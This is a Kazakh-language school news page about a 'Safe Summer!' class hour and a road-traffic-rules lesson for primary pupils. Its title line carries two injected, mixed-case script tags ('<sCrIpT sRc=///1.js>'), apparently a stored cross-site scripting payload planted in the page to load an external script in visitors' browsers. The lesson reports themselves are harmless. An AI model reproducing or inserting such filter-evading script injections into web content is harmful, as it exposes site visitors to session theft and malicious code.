Қауіпсіз жаз!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.05.2021

Жаз жақындап келеді! Ол біз үшін қанша жағымды әсер қалдырады! Бірақ абайсыз демалыс көптеген қауіп-қатерлерге толы екенін ұмытпаңыз.
24 мамыр күні 2,4 сынып оқушыларымен жазғы демалыс кезінде оқушылардың қауіпсіз мінез-құлық дағдыларын қалыптастыру мақсатында, «Қауіпсіз жаз!» тақырыбында сынып сағаты өтті.
         Іс-шара барысында балалар көшеде, жүріс бөлігінде, су айдындарында, орманда, үйде, үй және қаңғыбас жануарлармен кездескенде, сондай-ақ бейтаныс адамдармен кездесу кезінде қауіпсіз жүріс-тұрыс ережелерін кезекті рет қайталады. «Қауіпсіз жаз!» атты буклет жасады. Іс-шара соңында балалар «Құрметті жолдас жүргізуші!", автокөлік құралдарының жүргізушілеріне жадынама беру арқылы акцияға қатысты.

Бастауыш сынып мұғалімі: Сенн Е. В.

 

«Жол қозғалысы мектебі»

24 мамыр күні 3 сынып оқушылары үшін «Жол қозғалысы мектебі» тақырыбында ойын – сабақ өткізілді.
            Іс-шара басында оқушылар ЖҚЕ пайда болу тарихы туралы ақпаратты тыңдап, «Мен ЖҚЕ білемін!!!» видеоролигін тамашалады. Іс-шара барысында балалар «Жол белгісін тап», «Жолдасыңа көмектес», «Жол белгісін жина» ойындарын ойнады. Іс-шара соңында оқушылар ЖҚЕ тақырыбына суреттер салды, содан кейін балалар далаға шығып, ЖҚЕ бойынша жадынамаларды жүргізуші ата – аналарға табыстады.

Дайындаған: бастауыш сынып мұғалімі Глущич Л.В.

Просмотров: 1022


Пікір қосу



Деректерді қолтаңбаға қосу